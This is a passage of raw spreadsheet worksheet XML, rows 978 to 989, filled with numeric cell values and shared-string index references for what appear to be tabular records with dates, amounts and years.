      <c r="AV978">
        <v>1</v>
      </c>
      <c r="AW978">
        <v>6</v>
      </c>
      <c r="AX978">
        <v>0</v>
      </c>
      <c r="AY978">
        <v>6</v>
      </c>
      <c r="AZ978">
        <v>0</v>
      </c>
      <c r="BA978" t="s">
        <v>17466</v>
      </c>
      <c r="BB978" t="s">
        <v>17471</v>
      </c>
      <c r="BC978" t="s">
        <v>11750</v>
      </c>
      <c r="BD978" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="979" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A979">
        <v>4866</v>
      </c>
      <c r="B979" t="s">
        <v>7489</v>
      </c>
      <c r="C979" t="s">
        <v>47</v>
      </c>
      <c r="D979" t="s">
        <v>7490</v>
      </c>
      <c r="E979" t="s">
        <v>363</v>
      </c>
      <c r="F979" t="s">
        <v>7491</v>
      </c>
      <c r="G979" s="1">
        <v>44110</v>
      </c>
      <c r="H979">
        <v>5649</v>
      </c>
      <c r="I979">
        <v>5649</v>
      </c>
      <c r="J979">
        <v>0</v>
      </c>
      <c r="K979">
        <v>0</v>
      </c>
      <c r="L979">
        <v>0</v>
      </c>
      <c r="M979">
        <v>0</v>
      </c>
      <c r="N979">
        <v>0</v>
      </c>
      <c r="O979">
        <v>0</v>
      </c>
      <c r="P979">
        <v>0</v>
      </c>
      <c r="Q979">
        <v>0</v>
      </c>
      <c r="R979">
        <v>0</v>
      </c>
      <c r="S979">
        <v>0</v>
      </c>
      <c r="T979">
        <v>1</v>
      </c>
      <c r="U979">
        <v>0</v>
      </c>
      <c r="V979">
        <v>0</v>
      </c>
      <c r="W979">
        <v>0</v>
      </c>
      <c r="X979">
        <v>0</v>
      </c>
      <c r="Y979">
        <v>0</v>
      </c>
      <c r="Z979">
        <v>0</v>
      </c>
      <c r="AA979">
        <v>0</v>
      </c>
      <c r="AB979">
        <v>0</v>
      </c>
      <c r="AC979">
        <v>0</v>
      </c>
      <c r="AD979">
        <v>0</v>
      </c>
      <c r="AE979">
        <v>100000</v>
      </c>
      <c r="AF979" t="s">
        <v>7492</v>
      </c>
      <c r="AG979">
        <v>21352</v>
      </c>
      <c r="AH979">
        <v>2</v>
      </c>
      <c r="AJ979">
        <v>31</v>
      </c>
      <c r="AK979" t="s">
        <v>685</v>
      </c>
      <c r="AL979" t="s">
        <v>7493</v>
      </c>
      <c r="AM979" t="s">
        <v>7494</v>
      </c>
      <c r="AN979" t="s">
        <v>68</v>
      </c>
      <c r="AO979">
        <v>2020</v>
      </c>
      <c r="AP979">
        <v>811628005</v>
      </c>
      <c r="AQ979" t="s">
        <v>7495</v>
      </c>
      <c r="AR979" t="s">
        <v>7492</v>
      </c>
      <c r="AS979" t="s">
        <v>71</v>
      </c>
      <c r="AT979" t="s">
        <v>72</v>
      </c>
      <c r="AU979">
        <v>30</v>
      </c>
      <c r="AV979">
        <v>1</v>
      </c>
      <c r="AW979">
        <v>5</v>
      </c>
      <c r="AX979">
        <v>0</v>
      </c>
      <c r="AY979">
        <v>0</v>
      </c>
      <c r="AZ979">
        <v>10</v>
      </c>
      <c r="BA979" t="s">
        <v>17454</v>
      </c>
      <c r="BB979">
        <v>0</v>
      </c>
      <c r="BC979">
        <v>0</v>
      </c>
      <c r="BD979" t="s">
        <v>10582</v>
      </c>
    </row>
    <row r="980" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A980">
        <v>4921</v>
      </c>
      <c r="B980" t="s">
        <v>7496</v>
      </c>
      <c r="C980" t="s">
        <v>74</v>
      </c>
      <c r="D980" t="s">
        <v>7497</v>
      </c>
      <c r="E980" t="s">
        <v>142</v>
      </c>
      <c r="F980" t="s">
        <v>7498</v>
      </c>
      <c r="G980" s="1">
        <v>44272</v>
      </c>
      <c r="H980">
        <v>5673</v>
      </c>
      <c r="I980">
        <v>5673</v>
      </c>
      <c r="J980">
        <v>0</v>
      </c>
      <c r="K980">
        <v>2</v>
      </c>
      <c r="L980">
        <v>1</v>
      </c>
      <c r="M980">
        <v>0</v>
      </c>
      <c r="N980">
        <v>0</v>
      </c>
      <c r="O980">
        <v>0</v>
      </c>
      <c r="P980">
        <v>0</v>
      </c>
      <c r="Q980">
        <v>0</v>
      </c>
      <c r="R980">
        <v>4</v>
      </c>
      <c r="S980">
        <v>0</v>
      </c>
      <c r="T980">
        <v>0</v>
      </c>
      <c r="U980">
        <v>0</v>
      </c>
      <c r="V980">
        <v>100000</v>
      </c>
      <c r="W980">
        <v>3000</v>
      </c>
      <c r="X980">
        <v>0</v>
      </c>
      <c r="Y980">
        <v>0</v>
      </c>
      <c r="Z980">
        <v>0</v>
      </c>
      <c r="AA980">
        <v>0</v>
      </c>
      <c r="AB980">
        <v>0</v>
      </c>
      <c r="AC980">
        <v>2000</v>
      </c>
      <c r="AD980">
        <v>0</v>
      </c>
      <c r="AE980">
        <v>0</v>
      </c>
      <c r="AF980" t="s">
        <v>7499</v>
      </c>
      <c r="AG980">
        <v>59212</v>
      </c>
      <c r="AH980">
        <v>14</v>
      </c>
      <c r="AJ980">
        <v>204</v>
      </c>
      <c r="AK980" t="s">
        <v>1117</v>
      </c>
      <c r="AL980" t="s">
        <v>7500</v>
      </c>
      <c r="AM980" t="s">
        <v>7501</v>
      </c>
      <c r="AN980" t="s">
        <v>55</v>
      </c>
      <c r="AO980">
        <v>2018</v>
      </c>
      <c r="AP980" t="s">
        <v>3630</v>
      </c>
      <c r="AQ980" t="s">
        <v>7502</v>
      </c>
      <c r="AR980" t="s">
        <v>7503</v>
      </c>
      <c r="AS980" t="s">
        <v>71</v>
      </c>
      <c r="AT980" t="s">
        <v>58</v>
      </c>
      <c r="AU980">
        <v>25</v>
      </c>
      <c r="AV980">
        <v>0</v>
      </c>
      <c r="AW980">
        <v>15</v>
      </c>
      <c r="AX980">
        <v>0</v>
      </c>
      <c r="AY980">
        <v>3</v>
      </c>
      <c r="AZ980">
        <v>0</v>
      </c>
      <c r="BA980" t="s">
        <v>16774</v>
      </c>
      <c r="BB980">
        <v>0</v>
      </c>
      <c r="BC980" t="s">
        <v>11827</v>
      </c>
      <c r="BD980">
        <v>0</v>
      </c>
    </row>
    <row r="981" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A981">
        <v>4908</v>
      </c>
      <c r="B981" t="s">
        <v>7504</v>
      </c>
      <c r="C981" t="s">
        <v>607</v>
      </c>
      <c r="D981" t="s">
        <v>7505</v>
      </c>
      <c r="E981" t="s">
        <v>142</v>
      </c>
      <c r="F981" t="s">
        <v>7506</v>
      </c>
      <c r="G981" s="1">
        <v>44109</v>
      </c>
      <c r="H981">
        <v>5680</v>
      </c>
      <c r="I981">
        <v>5680</v>
      </c>
      <c r="J981">
        <v>1</v>
      </c>
      <c r="K981">
        <v>0</v>
      </c>
      <c r="L981">
        <v>1</v>
      </c>
      <c r="M981">
        <v>0</v>
      </c>
      <c r="N981">
        <v>0</v>
      </c>
      <c r="O981">
        <v>0</v>
      </c>
      <c r="P981">
        <v>0</v>
      </c>
      <c r="Q981">
        <v>0</v>
      </c>
      <c r="R981">
        <v>4</v>
      </c>
      <c r="S981">
        <v>1</v>
      </c>
      <c r="T981">
        <v>0</v>
      </c>
      <c r="U981">
        <v>30000</v>
      </c>
      <c r="V981">
        <v>0</v>
      </c>
      <c r="W981">
        <v>3000</v>
      </c>
      <c r="X981">
        <v>0</v>
      </c>
      <c r="Y981">
        <v>0</v>
      </c>
      <c r="Z981">
        <v>0</v>
      </c>
      <c r="AA981">
        <v>0</v>
      </c>
      <c r="AB981">
        <v>0</v>
      </c>
      <c r="AC981">
        <v>1500</v>
      </c>
      <c r="AD981">
        <v>1000</v>
      </c>
      <c r="AE981">
        <v>0</v>
      </c>
      <c r="AF981" t="s">
        <v>7507</v>
      </c>
      <c r="AG981">
        <v>77112</v>
      </c>
      <c r="AH981">
        <v>24</v>
      </c>
      <c r="AJ981">
        <v>370</v>
      </c>
      <c r="AK981" t="s">
        <v>7059</v>
      </c>
      <c r="AL981" t="s">
        <v>7508</v>
      </c>
      <c r="AM981" t="s">
        <v>7509</v>
      </c>
      <c r="AN981" t="s">
        <v>68</v>
      </c>
      <c r="AO981">
        <v>2018</v>
      </c>
      <c r="AP981" t="s">
        <v>7510</v>
      </c>
      <c r="AQ981" t="s">
        <v>7511</v>
      </c>
      <c r="AR981" t="s">
        <v>7507</v>
      </c>
      <c r="AS981" t="s">
        <v>71</v>
      </c>
      <c r="AT981" t="s">
        <v>72</v>
      </c>
      <c r="AU981">
        <v>30</v>
      </c>
      <c r="AV981">
        <v>0</v>
      </c>
      <c r="AW981">
        <v>14</v>
      </c>
      <c r="AX981">
        <v>16</v>
      </c>
      <c r="AY981">
        <v>3</v>
      </c>
      <c r="AZ981">
        <v>3</v>
      </c>
      <c r="BA981" t="s">
        <v>17482</v>
      </c>
      <c r="BB981">
        <v>0</v>
      </c>
      <c r="BC981">
        <v>0</v>
      </c>
      <c r="BD981">
        <v>0</v>
      </c>
    </row>
    <row r="982" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A982">
        <v>4805</v>
      </c>
      <c r="B982" t="s">
        <v>7512</v>
      </c>
      <c r="C982" t="s">
        <v>2760</v>
      </c>
      <c r="D982" t="s">
        <v>7513</v>
      </c>
      <c r="E982" t="s">
        <v>49</v>
      </c>
      <c r="F982" t="s">
        <v>7514</v>
      </c>
      <c r="G982" s="1">
        <v>44126</v>
      </c>
      <c r="H982">
        <v>5695</v>
      </c>
      <c r="I982">
        <v>5695</v>
      </c>
      <c r="J982">
        <v>1</v>
      </c>
      <c r="K982">
        <v>0</v>
      </c>
      <c r="L982">
        <v>0</v>
      </c>
      <c r="M982">
        <v>0</v>
      </c>
      <c r="N982">
        <v>0</v>
      </c>
      <c r="O982">
        <v>2</v>
      </c>
      <c r="P982">
        <v>0</v>
      </c>
      <c r="Q982">
        <v>1</v>
      </c>
      <c r="R982">
        <v>1</v>
      </c>
      <c r="S982">
        <v>0</v>
      </c>
      <c r="T982">
        <v>0</v>
      </c>
      <c r="U982">
        <v>0</v>
      </c>
      <c r="V982">
        <v>0</v>
      </c>
      <c r="W982">
        <v>0</v>
      </c>
      <c r="X982">
        <v>0</v>
      </c>
      <c r="Y982">
        <v>0</v>
      </c>
      <c r="Z982">
        <v>0</v>
      </c>
      <c r="AA982">
        <v>0</v>
      </c>
      <c r="AB982">
        <v>0</v>
      </c>
      <c r="AC982">
        <v>0</v>
      </c>
      <c r="AD982">
        <v>0</v>
      </c>
      <c r="AE982">
        <v>0</v>
      </c>
      <c r="AF982" t="s">
        <v>7515</v>
      </c>
      <c r="AG982">
        <v>83353</v>
      </c>
      <c r="AH982">
        <v>18</v>
      </c>
      <c r="AJ982">
        <v>290</v>
      </c>
      <c r="AK982" t="s">
        <v>7516</v>
      </c>
      <c r="AL982" t="s">
        <v>7517</v>
      </c>
      <c r="AM982" t="s">
        <v>7518</v>
      </c>
      <c r="AN982" t="s">
        <v>68</v>
      </c>
      <c r="AO982">
        <v>2015</v>
      </c>
      <c r="AP982">
        <v>87732525792</v>
      </c>
      <c r="AQ982" t="s">
        <v>7519</v>
      </c>
      <c r="AR982" t="s">
        <v>7515</v>
      </c>
      <c r="AS982" t="s">
        <v>71</v>
      </c>
      <c r="AT982" t="s">
        <v>72</v>
      </c>
      <c r="AU982">
        <v>25</v>
      </c>
      <c r="AV982">
        <v>1</v>
      </c>
      <c r="AW982">
        <v>0</v>
      </c>
      <c r="AX982">
        <v>0</v>
      </c>
      <c r="AY982">
        <v>2</v>
      </c>
      <c r="AZ982">
        <v>12</v>
      </c>
      <c r="BA982" t="s">
        <v>17417</v>
      </c>
      <c r="BB982">
        <v>0</v>
      </c>
      <c r="BC982" t="s">
        <v>11765</v>
      </c>
      <c r="BD982">
        <v>0</v>
      </c>
    </row>
    <row r="983" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A983">
        <v>4909</v>
      </c>
      <c r="B983" t="s">
        <v>7520</v>
      </c>
      <c r="C983" t="s">
        <v>726</v>
      </c>
      <c r="D983" t="s">
        <v>7521</v>
      </c>
      <c r="E983" t="s">
        <v>142</v>
      </c>
      <c r="F983" t="s">
        <v>1746</v>
      </c>
      <c r="G983" s="1">
        <v>44216</v>
      </c>
      <c r="H983">
        <v>5722</v>
      </c>
      <c r="I983">
        <v>5722</v>
      </c>
      <c r="J983">
        <v>2</v>
      </c>
      <c r="K983">
        <v>0</v>
      </c>
      <c r="L983">
        <v>1</v>
      </c>
      <c r="M983">
        <v>0</v>
      </c>
      <c r="N983">
        <v>0</v>
      </c>
      <c r="O983">
        <v>0</v>
      </c>
      <c r="P983">
        <v>0</v>
      </c>
      <c r="Q983">
        <v>7</v>
      </c>
      <c r="R983">
        <v>3</v>
      </c>
      <c r="S983">
        <v>0</v>
      </c>
      <c r="T983">
        <v>0</v>
      </c>
      <c r="U983">
        <v>80000</v>
      </c>
      <c r="V983">
        <v>0</v>
      </c>
      <c r="W983">
        <v>750</v>
      </c>
      <c r="X983">
        <v>0</v>
      </c>
      <c r="Y983">
        <v>0</v>
      </c>
      <c r="Z983">
        <v>0</v>
      </c>
      <c r="AA983">
        <v>0</v>
      </c>
      <c r="AB983">
        <v>600</v>
      </c>
      <c r="AC983">
        <v>800</v>
      </c>
      <c r="AD983">
        <v>0</v>
      </c>
      <c r="AE983">
        <v>0</v>
      </c>
      <c r="AF983" t="s">
        <v>7522</v>
      </c>
      <c r="AG983">
        <v>97771</v>
      </c>
      <c r="AH983">
        <v>32</v>
      </c>
      <c r="AJ983">
        <v>469</v>
      </c>
      <c r="AK983" t="s">
        <v>7523</v>
      </c>
      <c r="AL983" t="s">
        <v>7524</v>
      </c>
      <c r="AM983" t="s">
        <v>7525</v>
      </c>
      <c r="AN983" t="s">
        <v>55</v>
      </c>
      <c r="AO983">
        <v>2007</v>
      </c>
      <c r="AP983">
        <v>81247164810</v>
      </c>
      <c r="AQ983" t="s">
        <v>7526</v>
      </c>
      <c r="AR983" t="s">
        <v>7527</v>
      </c>
      <c r="AS983" t="s">
        <v>71</v>
      </c>
      <c r="AT983" t="s">
        <v>58</v>
      </c>
      <c r="AU983">
        <v>25</v>
      </c>
      <c r="AV983">
        <v>0</v>
      </c>
      <c r="AW983">
        <v>15</v>
      </c>
      <c r="AX983">
        <v>10</v>
      </c>
      <c r="AY983">
        <v>7</v>
      </c>
      <c r="AZ983">
        <v>3</v>
      </c>
      <c r="BA983" t="s">
        <v>17483</v>
      </c>
      <c r="BB983" t="s">
        <v>16057</v>
      </c>
      <c r="BC983" t="s">
        <v>11806</v>
      </c>
      <c r="BD983" t="s">
        <v>11807</v>
      </c>
    </row>
    <row r="984" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A984">
        <v>4911</v>
      </c>
      <c r="B984" t="s">
        <v>7528</v>
      </c>
      <c r="C984" t="s">
        <v>88</v>
      </c>
      <c r="D984" t="s">
        <v>7529</v>
      </c>
      <c r="E984" t="s">
        <v>142</v>
      </c>
      <c r="F984" t="s">
        <v>1487</v>
      </c>
      <c r="G984" s="1">
        <v>44253</v>
      </c>
      <c r="H984">
        <v>5738</v>
      </c>
      <c r="I984">
        <v>5738</v>
      </c>
      <c r="J984">
        <v>1</v>
      </c>
      <c r="K984">
        <v>0</v>
      </c>
      <c r="L984">
        <v>4</v>
      </c>
      <c r="M984">
        <v>0</v>
      </c>
      <c r="N984">
        <v>0</v>
      </c>
      <c r="O984">
        <v>0</v>
      </c>
      <c r="P984">
        <v>0</v>
      </c>
      <c r="Q984">
        <v>0</v>
      </c>
      <c r="R984">
        <v>0</v>
      </c>
      <c r="S984">
        <v>0</v>
      </c>
      <c r="T984">
        <v>0</v>
      </c>
      <c r="U984">
        <v>500000</v>
      </c>
      <c r="V984">
        <v>0</v>
      </c>
      <c r="W984">
        <v>28000</v>
      </c>
      <c r="X984">
        <v>0</v>
      </c>
      <c r="Y984">
        <v>0</v>
      </c>
      <c r="Z984">
        <v>0</v>
      </c>
      <c r="AA984">
        <v>0</v>
      </c>
      <c r="AB984">
        <v>0</v>
      </c>
      <c r="AC984">
        <v>0</v>
      </c>
      <c r="AD984">
        <v>0</v>
      </c>
      <c r="AE984">
        <v>0</v>
      </c>
      <c r="AF984" t="s">
        <v>7530</v>
      </c>
      <c r="AG984">
        <v>80222</v>
      </c>
      <c r="AH984">
        <v>17</v>
      </c>
      <c r="AJ984">
        <v>282</v>
      </c>
      <c r="AK984" t="s">
        <v>592</v>
      </c>
      <c r="AL984" t="s">
        <v>593</v>
      </c>
      <c r="AM984" t="s">
        <v>7531</v>
      </c>
      <c r="AN984" t="s">
        <v>82</v>
      </c>
      <c r="AO984">
        <v>2012</v>
      </c>
      <c r="AP984">
        <v>8126096162</v>
      </c>
      <c r="AQ984" t="s">
        <v>7532</v>
      </c>
      <c r="AR984" t="s">
        <v>7530</v>
      </c>
      <c r="AS984" t="s">
        <v>71</v>
      </c>
      <c r="AT984" t="s">
        <v>86</v>
      </c>
      <c r="AU984">
        <v>54</v>
      </c>
      <c r="AV984">
        <v>1</v>
      </c>
      <c r="AW984">
        <v>0</v>
      </c>
      <c r="AX984">
        <v>0</v>
      </c>
      <c r="AY984">
        <v>22</v>
      </c>
      <c r="AZ984">
        <v>5</v>
      </c>
      <c r="BA984" t="s">
        <v>17484</v>
      </c>
      <c r="BB984">
        <v>0</v>
      </c>
      <c r="BC984" t="s">
        <v>12881</v>
      </c>
      <c r="BD984">
        <v>0</v>
      </c>
    </row>
    <row r="985" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A985">
        <v>4902</v>
      </c>
      <c r="B985" t="s">
        <v>7533</v>
      </c>
      <c r="C985" t="s">
        <v>2160</v>
      </c>
      <c r="D985" t="s">
        <v>7534</v>
      </c>
      <c r="E985" t="s">
        <v>76</v>
      </c>
      <c r="F985" t="s">
        <v>7535</v>
      </c>
      <c r="G985" s="1">
        <v>44148</v>
      </c>
      <c r="H985">
        <v>5757</v>
      </c>
      <c r="I985">
        <v>5757</v>
      </c>
      <c r="J985">
        <v>1</v>
      </c>
      <c r="K985">
        <v>1</v>
      </c>
      <c r="L985">
        <v>0</v>
      </c>
      <c r="M985">
        <v>0</v>
      </c>
      <c r="N985">
        <v>0</v>
      </c>
      <c r="O985">
        <v>0</v>
      </c>
      <c r="P985">
        <v>0</v>
      </c>
      <c r="Q985">
        <v>1</v>
      </c>
      <c r="R985">
        <v>2</v>
      </c>
      <c r="S985">
        <v>0</v>
      </c>
      <c r="T985">
        <v>1</v>
      </c>
      <c r="U985">
        <v>100</v>
      </c>
      <c r="V985">
        <v>100</v>
      </c>
      <c r="W985">
        <v>0</v>
      </c>
      <c r="X985">
        <v>0</v>
      </c>
      <c r="Y985">
        <v>0</v>
      </c>
      <c r="Z985">
        <v>0</v>
      </c>
      <c r="AA985">
        <v>0</v>
      </c>
      <c r="AB985">
        <v>20</v>
      </c>
      <c r="AC985">
        <v>200</v>
      </c>
      <c r="AD985">
        <v>0</v>
      </c>
      <c r="AE985">
        <v>100</v>
      </c>
      <c r="AF985" t="s">
        <v>7536</v>
      </c>
      <c r="AG985">
        <v>73112</v>
      </c>
      <c r="AH985">
        <v>21</v>
      </c>
      <c r="AJ985">
        <v>342</v>
      </c>
      <c r="AK985" t="s">
        <v>7537</v>
      </c>
      <c r="AL985" t="s">
        <v>7538</v>
      </c>
      <c r="AM985" t="s">
        <v>7539</v>
      </c>
      <c r="AN985" t="s">
        <v>68</v>
      </c>
      <c r="AO985">
        <v>2016</v>
      </c>
      <c r="AP985">
        <v>81222300369</v>
      </c>
      <c r="AQ985" t="s">
        <v>7540</v>
      </c>
      <c r="AR985" t="s">
        <v>7536</v>
      </c>
      <c r="AS985" t="s">
        <v>71</v>
      </c>
      <c r="AT985" t="s">
        <v>72</v>
      </c>
      <c r="AU985">
        <v>5</v>
      </c>
      <c r="AV985">
        <v>1</v>
      </c>
      <c r="AW985">
        <v>0</v>
      </c>
      <c r="AX985">
        <v>2</v>
      </c>
      <c r="AY985">
        <v>0</v>
      </c>
      <c r="AZ985">
        <v>4</v>
      </c>
      <c r="BA985" t="s">
        <v>17480</v>
      </c>
      <c r="BB985">
        <v>0</v>
      </c>
      <c r="BC985" t="s">
        <v>12213</v>
      </c>
      <c r="BD985">
        <v>0</v>
      </c>
    </row>
    <row r="986" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A986">
        <v>4919</v>
      </c>
      <c r="B986" t="s">
        <v>7541</v>
      </c>
      <c r="C986" t="s">
        <v>157</v>
      </c>
      <c r="D986" t="s">
        <v>7542</v>
      </c>
      <c r="E986" t="s">
        <v>142</v>
      </c>
      <c r="F986" t="s">
        <v>666</v>
      </c>
      <c r="G986" s="1">
        <v>44204</v>
      </c>
      <c r="H986">
        <v>5806</v>
      </c>
      <c r="I986">
        <v>5806</v>
      </c>
      <c r="J986">
        <v>2</v>
      </c>
      <c r="K986">
        <v>0</v>
      </c>
      <c r="L986">
        <v>3</v>
      </c>
      <c r="M986">
        <v>1</v>
      </c>
      <c r="N986">
        <v>0</v>
      </c>
      <c r="O986">
        <v>0</v>
      </c>
      <c r="P986">
        <v>0</v>
      </c>
      <c r="Q986">
        <v>3</v>
      </c>
      <c r="R986">
        <v>10</v>
      </c>
      <c r="S986">
        <v>1</v>
      </c>
      <c r="T986">
        <v>0</v>
      </c>
      <c r="U986">
        <v>400000</v>
      </c>
      <c r="V986">
        <v>0</v>
      </c>
      <c r="W986">
        <v>7500</v>
      </c>
      <c r="X986">
        <v>1500</v>
      </c>
      <c r="Y986">
        <v>0</v>
      </c>
      <c r="Z986">
        <v>0</v>
      </c>
      <c r="AA986">
        <v>0</v>
      </c>
      <c r="AB986">
        <v>0</v>
      </c>
      <c r="AC986">
        <v>10000</v>
      </c>
      <c r="AD986">
        <v>1</v>
      </c>
      <c r="AE986">
        <v>0</v>
      </c>
      <c r="AF986" t="s">
        <v>7543</v>
      </c>
      <c r="AG986">
        <v>68472</v>
      </c>
      <c r="AH986">
        <v>16</v>
      </c>
      <c r="AJ986">
        <v>237</v>
      </c>
      <c r="AK986" t="s">
        <v>377</v>
      </c>
      <c r="AL986" t="s">
        <v>378</v>
      </c>
      <c r="AM986" t="s">
        <v>7544</v>
      </c>
      <c r="AN986" t="s">
        <v>55</v>
      </c>
      <c r="AO986">
        <v>2020</v>
      </c>
      <c r="AP986">
        <v>5980270</v>
      </c>
      <c r="AQ986" t="s">
        <v>7545</v>
      </c>
      <c r="AR986" t="s">
        <v>7543</v>
      </c>
      <c r="AS986" t="s">
        <v>71</v>
      </c>
      <c r="AT986" t="s">
        <v>58</v>
      </c>
      <c r="AU986">
        <v>6</v>
      </c>
      <c r="AV986">
        <v>3</v>
      </c>
      <c r="AW986">
        <v>15</v>
      </c>
      <c r="AX986">
        <v>15</v>
      </c>
      <c r="AY986">
        <v>7</v>
      </c>
      <c r="AZ986">
        <v>1</v>
      </c>
      <c r="BA986" t="s">
        <v>17486</v>
      </c>
      <c r="BB986">
        <v>0</v>
      </c>
      <c r="BC986" t="s">
        <v>11833</v>
      </c>
      <c r="BD986" t="s">
        <v>11834</v>
      </c>
    </row>
    <row r="987" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A987">
        <v>4901</v>
      </c>
      <c r="B987" t="s">
        <v>7546</v>
      </c>
      <c r="C987" t="s">
        <v>47</v>
      </c>
      <c r="D987" t="s">
        <v>7547</v>
      </c>
      <c r="E987" t="s">
        <v>4157</v>
      </c>
      <c r="F987" t="s">
        <v>7548</v>
      </c>
      <c r="G987" s="1">
        <v>44236</v>
      </c>
      <c r="H987">
        <v>5839</v>
      </c>
      <c r="I987">
        <v>5839</v>
      </c>
      <c r="J987">
        <v>0</v>
      </c>
      <c r="K987">
        <v>0</v>
      </c>
      <c r="L987">
        <v>0</v>
      </c>
      <c r="M987">
        <v>0</v>
      </c>
      <c r="N987">
        <v>0</v>
      </c>
      <c r="O987">
        <v>0</v>
      </c>
      <c r="P987">
        <v>0</v>
      </c>
      <c r="Q987">
        <v>0</v>
      </c>
      <c r="R987">
        <v>0</v>
      </c>
      <c r="S987">
        <v>0</v>
      </c>
      <c r="T987">
        <v>1</v>
      </c>
      <c r="U987">
        <v>0</v>
      </c>
      <c r="V987">
        <v>0</v>
      </c>
      <c r="W987">
        <v>0</v>
      </c>
      <c r="X987">
        <v>0</v>
      </c>
      <c r="Y987">
        <v>0</v>
      </c>
      <c r="Z987">
        <v>0</v>
      </c>
      <c r="AA987">
        <v>0</v>
      </c>
      <c r="AB987">
        <v>0</v>
      </c>
      <c r="AC987">
        <v>0</v>
      </c>
      <c r="AD987">
        <v>0</v>
      </c>
      <c r="AE987">
        <v>6000</v>
      </c>
      <c r="AF987" t="s">
        <v>7549</v>
      </c>
      <c r="AG987">
        <v>21383</v>
      </c>
      <c r="AH987">
        <v>2</v>
      </c>
      <c r="AJ987">
        <v>31</v>
      </c>
      <c r="AK987" t="s">
        <v>7550</v>
      </c>
      <c r="AL987" t="s">
        <v>7551</v>
      </c>
      <c r="AM987" t="s">
        <v>7552</v>
      </c>
      <c r="AN987" t="s">
        <v>55</v>
      </c>
      <c r="AO987">
        <v>2020</v>
      </c>
      <c r="AP987">
        <v>81317422953</v>
      </c>
      <c r="AQ987" t="s">
        <v>7553</v>
      </c>
      <c r="AR987" t="s">
        <v>7549</v>
      </c>
      <c r="AS987" t="s">
        <v>71</v>
      </c>
      <c r="AT987" t="s">
        <v>58</v>
      </c>
      <c r="AU987">
        <v>31</v>
      </c>
      <c r="AV987">
        <v>1</v>
      </c>
      <c r="AW987">
        <v>20</v>
      </c>
      <c r="AX987">
        <v>2</v>
      </c>
      <c r="AY987">
        <v>0</v>
      </c>
      <c r="AZ987">
        <v>0</v>
      </c>
      <c r="BA987" t="s">
        <v>17479</v>
      </c>
      <c r="BB987">
        <v>0</v>
      </c>
      <c r="BC987" t="s">
        <v>12919</v>
      </c>
      <c r="BD987" t="s">
        <v>12920</v>
      </c>
    </row>
    <row r="988" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A988">
        <v>4898</v>
      </c>
      <c r="B988" t="s">
        <v>7554</v>
      </c>
      <c r="C988" t="s">
        <v>199</v>
      </c>
      <c r="D988" t="s">
        <v>7555</v>
      </c>
      <c r="E988" t="s">
        <v>111</v>
      </c>
      <c r="F988" t="s">
        <v>7556</v>
      </c>
      <c r="G988" s="1">
        <v>44104</v>
      </c>
      <c r="H988">
        <v>5859</v>
      </c>
      <c r="I988">
        <v>5859</v>
      </c>
      <c r="J988">
        <v>1</v>
      </c>
      <c r="K988">
        <v>0</v>
      </c>
      <c r="L988">
        <v>2</v>
      </c>
      <c r="M988">
        <v>0</v>
      </c>
      <c r="N988">
        <v>0</v>
      </c>
      <c r="O988">
        <v>0</v>
      </c>
      <c r="P988">
        <v>0</v>
      </c>
      <c r="Q988">
        <v>3</v>
      </c>
      <c r="R988">
        <v>4</v>
      </c>
      <c r="S988">
        <v>0</v>
      </c>
      <c r="T988">
        <v>1</v>
      </c>
      <c r="U988">
        <v>150000</v>
      </c>
      <c r="V988">
        <v>0</v>
      </c>
      <c r="W988">
        <v>6000</v>
      </c>
      <c r="X988">
        <v>0</v>
      </c>
      <c r="Y988">
        <v>0</v>
      </c>
      <c r="Z988">
        <v>0</v>
      </c>
      <c r="AA988">
        <v>0</v>
      </c>
      <c r="AB988">
        <v>4000</v>
      </c>
      <c r="AC988">
        <v>6000</v>
      </c>
      <c r="AD988">
        <v>0</v>
      </c>
      <c r="AE988">
        <v>1000</v>
      </c>
      <c r="AF988" t="s">
        <v>7557</v>
      </c>
      <c r="AG988">
        <v>23127</v>
      </c>
      <c r="AH988">
        <v>1</v>
      </c>
      <c r="AJ988">
        <v>19</v>
      </c>
      <c r="AK988" t="s">
        <v>7558</v>
      </c>
      <c r="AL988" t="s">
        <v>7559</v>
      </c>
      <c r="AM988" t="s">
        <v>7560</v>
      </c>
      <c r="AN988" t="s">
        <v>55</v>
      </c>
      <c r="AO988">
        <v>2020</v>
      </c>
      <c r="AP988">
        <v>8116822111</v>
      </c>
      <c r="AQ988" t="s">
        <v>7561</v>
      </c>
      <c r="AR988" t="s">
        <v>7557</v>
      </c>
      <c r="AS988" t="s">
        <v>71</v>
      </c>
      <c r="AT988" t="s">
        <v>58</v>
      </c>
      <c r="AU988">
        <v>0</v>
      </c>
      <c r="AV988">
        <v>0</v>
      </c>
      <c r="AW988">
        <v>0</v>
      </c>
      <c r="AX988">
        <v>0</v>
      </c>
      <c r="AY988">
        <v>15</v>
      </c>
      <c r="AZ988">
        <v>1</v>
      </c>
      <c r="BA988" t="s">
        <v>17477</v>
      </c>
      <c r="BB988" t="s">
        <v>16053</v>
      </c>
      <c r="BC988" t="s">
        <v>10141</v>
      </c>
      <c r="BD988" t="s">
        <v>11850</v>
      </c>
    </row>
    <row r="989" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A989">
        <v>4784</v>
      </c>
      <c r="B989" t="s">
        <v>7562</v>
      </c>
      <c r="C989" t="s">
        <v>458</v>
      </c>
      <c r="D989" t="s">
        <v>7563</v>
      </c>
      <c r="E989" t="s">
        <v>363</v>
      </c>
      <c r="F989" t="s">
        <v>7564</v>
      </c>
      <c r="G989" s="1">
        <v>44127</v>
      </c>
      <c r="H989">
        <v>5868</v>
      </c>
      <c r="I989">
        <v>5868</v>
      </c>
      <c r="J989">
        <v>0</v>
      </c>
      <c r="K989">
        <v>0</v>
      </c>
      <c r="L989">
        <v>0</v>
      </c>
      <c r="M989">
        <v>0</v>
      </c>
      <c r="N989">
        <v>0</v>
      </c>
      <c r="O989">
        <v>0</v>
      </c>
      <c r="P989">
        <v>0</v>
      </c>
      <c r="Q989">
        <v>0</v>
      </c>
      <c r="R989">
        <v>0</v>
      </c>
